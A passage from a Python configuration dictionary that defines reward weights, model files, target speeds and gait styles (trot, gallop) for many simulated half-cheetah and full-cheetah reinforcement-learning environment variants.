'distance_weigth': 5.0,
'ctrl_cost_weight': 0.1,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'EnergyPoint25-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.25,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'EnergyAlt-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.,
'horizontal_weight': 0.1,
'energy_weights': 1.5,
},
},
'HalfCheetahSquat6dof': { # 6 DoF
'Energyz-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'Energy0-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.25,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'EnergyPoint1-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.1,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'EnergyPoint25-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.25,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'EnergyAlt-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.,
'horizontal_weight': 0.1,
'energy_weights': 1.5,
},
},
'HalfCheetah2dof': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetah2dofv2': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetah2dofv3': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetah2dofv4': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetah2dofv5': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetah': { # 6 DoF
'EnergySix-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':6.0,
},
'EnergyFour-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':4.0,
},
'EnergyTwo-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':2.0,
},
'EnergyOnePoint5-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':1.5,
},
'EnergyOne-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':1.,
},
'EnergyPoint5-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':0.5,
},
'EnergyPoint1-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':0.1,
},
'Energy0-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':0,
},
'Symloss-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':0,
},
'Symdup-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energy0-v1': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'half_cheetah_v2.xml',
},
'Symloss-v1': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'half_cheetah_v2.xml',
},
'Symdup-v1': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'half_cheetah_v2.xml',
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
},
'FullCheetahHeavy': { # 6 DoF
'MinSpring-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
},
'MinSpring-v00': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
},
'MinSpring-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"speed": 1
},
'MinSpring-v25': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"speed": 1
},
'MinSpring-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"speed": 3
},
'MinSpring-v45': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"speed": 3
},
'MinSpring-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"speed": 5
},
'MinSpring-v65': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"speed": 5
},
'LessSpring-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv4.xml',
},
'LessSpring-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv4.xml',
"speed":1
},
'LessSpring-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv4.xml',
"speed": 3
},
'LessSpring-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv4.xml',
"speed": 5
},
'MoreSpring-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv5.xml',
},
'MoreSpring-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv5.xml',
"speed":1
},
'MoreSpring-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv5.xml',
"speed": 3
},
'MoreSpring-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv5.xml',
"speed": 5
},
'ExSpring-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
},
'ExSpring-v00': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
},
'ExSpring-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 1
},
'ExSpring-v25': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0.,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 1
},
'ExSpring-v210': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 1
},
'ExSpring-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 3
},
'ExSpring-v45': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0.,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 3
},
'ExSpring-v410': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 3
},
'ExSpring-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 5
},
'ExSpring-v65': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 5
},
'ExSpring-v610': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"speed": 5
},
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
},
'Energy0-v00': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
},
'Energy0-v1': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed":0.5
},
'Energy0-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed":1
},
'Energy0-v25': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 1
},
'Energy0-v3': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed":2
},
'Energy0-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 3
},
'Energy0-v45': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 3
},
'Energy0-v5': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 4
},
'Energy0-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 5
},
'Energy0-v65': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.25,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 5
},
'RealFC-v1': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.25 # 5m/s:0.25 10m/s:0.5 15m/s:0.75 20m/s:1 25m/s:1.25 30m/s: 1.5
},
'RealFC-v2': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.5
},
'RealFC-v3': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.75
},
'RealFC-v4': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1
},
'RealFC-v5': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1.25
},
'RealFC-v6': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1.5
},
'RealFCT-v1': {
'forward_reward_weight': 10.0,
'ctrl_cost_weight': 0.,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.25,
"walkstyle": "trot", # 5m/s:0.25 10m/s:0.5 15m/s:0.75 20m/s:1 25m/s:1.25 30m/s: 1.5
},
'RealFCT-v2': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.5,
"walkstyle": "trot",
},
'RealFCT-v3': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.75,
"walkstyle": "trot",
},
'RealFCT-v4': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1,
"walkstyle": "trot",
},
'RealFCT-v5': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1.25,
"walkstyle": "trot",
},
'RealFCT-v6': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1.5,
"walkstyle": "trot",
},
'RealFCG-v1': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.25,
"walkstyle": "gallop", # 5m/s:0.25 10m/s:0.5 15m/s:0.75 20m/s:1 25m/s:1.25 30m/s: 1.5
},
'RealFCG-v2': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.5,
"walkstyle": "gallop",
},
'RealFCG-v3': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 0.75,
"walkstyle": "gallop",
},
'RealFCG-v4': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1,
"walkstyle": "gallop",
},
'RealFCG-v5': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1.25,
"walkstyle": "gallop",
},
'RealFCG-v6': {
'forward_reward_weight': 5.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyReal.xml',
"speed": 1.5,
"walkstyle": "gallop",
},
'MinSpringGc-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
},
'MinSpringGc-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
"speed": 1
},
'MinSpringGc-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
"speed": 3
},
'MinSpringGc-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
"speed": 5
},
'ExSpringGc-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
},
'ExSpringGc-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
"speed": 1
},
'ExSpringGc-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
"speed": 3
},
'ExSpringGc-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
"speed": 5
},
'SymlossGc-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight': 8e-4,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
},
'SymlossGc-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight': 8e-4,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 1
},
'SymlossGc-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight': 8e-4,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 3
},
'SymlossGc-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'contact_cost_weight':8e-4,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 5
},
'SymlossGphase-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"phase_delay": 15,
},
'SymlossGphase-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 3,
"phase_delay":15,
},
'ExSpringGphase-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
"speed": 3,
"phase_delay":15,
},
'MinSpringGphase-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
"speed": 3,
"phase_delay":15,
},
'MinSpringG-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
},
'MinSpringG-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
"speed": 1
},
'MinSpringG-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
"speed": 3
},
'MinSpringG-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "gallop",
"speed": 5
},
'ExSpringG-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
},
'ExSpringG-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
"speed": 1
},
'ExSpringG-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
"speed": 3
},
'ExSpringG-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "gallop",
"speed": 5
},
'SymlossG-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
},
'SymlossG-v1': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 0.5
},
'SymlossG-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv3.xml',
"walkstyle": "gallop",
"speed": 1
},
'SymlossG-v3': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 2
},
'SymlossG-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 3
},
'SymlossG-v5': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 4
},
'SymlossG-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 5
},
'MinSpringT-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "trot",
},
'MinSpringT-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "trot",
"speed": 1
},
'MinSpringT-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "trot",
"speed": 3
},
'MinSpringT-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv6.xml',
"walkstyle": "trot",
"speed": 5
},
'ExSpringT-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "trot",
},
'ExSpringT-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "trot",
"speed": 1
},
'ExSpringT-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "trot",
"speed": 3
},
'ExSpringT-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
'xml_file': 'full_cheetah_heavyv7.xml',
"walkstyle": "trot",
"speed": 5
},
'SymlossT-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
},
'SymlossT-v1': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed":0.5
},
'SymlossT-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed":1
},
'SymlossT-v3': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 2
},
'SymlossT-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 3
},
'SymlossT-v5': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 4
},
'SymlossT-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 5
},
'SymlossT-v7': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trotv2",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 3
},
'SymlossT-v8': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trotv2",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 5
},
'SymlossGfblr-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallopFBLR",
'xml_file': 'full_cheetah_heavyv3.xml',
},
'SymPenG-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight" : 0.05,
"soft_gait_target" : 0,
"speed":3,
},
'SymPenG-v1': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight" : 0.05,#0.25#0.5
"soft_gait_target" : 0,
"speed":5,
},
'SymPenT-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight": 0.05,
"soft_gait_target": 0,
"speed":3,
},
'SymPenT-v1': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight": 0.05,
"soft_gait_target": 0,
"speed": 5,
},
'SymPenG-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight": 1,
"soft_gait_target": 2,
"speed": 3,
},
'SymPenG-v3': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight": 1,
"soft_gait_target": 2.5,
"speed": 3,
},
'SymPenG-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight": 1,
"soft_gait_target": 3,
"speed": 3,
},
'SymPenG-v5': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight": 1,
"soft_gait_target": 2,
"speed": 5,
},
'SymPenG-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight": 1,
"soft_gait_target": 2.5,
"speed": 5,
},
'SymPenG-v7': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight": 1,
"soft_gait_target": 3,
"speed": 5,
},
# 'SymPenG-v5': {
# 'forward_reward_weight': 1.0,
# 'ctrl_cost_weight': 0.1,
# 'energy_weights': 0,
# "walkstyle": "gallop2",
# 'xml_file': 'full_cheetah_heavyv3.xml',
# "soft_gait_penalty_weight": 1,
# "soft_gait_target": 0.25,
# "soft_gait_target2": 0.5,
# },
# 'SymPenG-v6': {
# 'forward_reward_weight': 1.0,
# 'ctrl_cost_weight': 0.1,
# 'energy_weights': 0,
# "walkstyle": "gallop2",
# 'xml_file': 'full_cheetah_heavyv3.xml',
# "soft_gait_penalty_weight": 1,
# "soft_gait_target": 0.5,
# "soft_gait_target2": 1,
# },
# 'SymPenG-v7': {
# 'forward_reward_weight': 1.0,
# 'ctrl_cost_weight': 0.1,
# 'energy_weights': 0,
# "walkstyle": "gallop2",
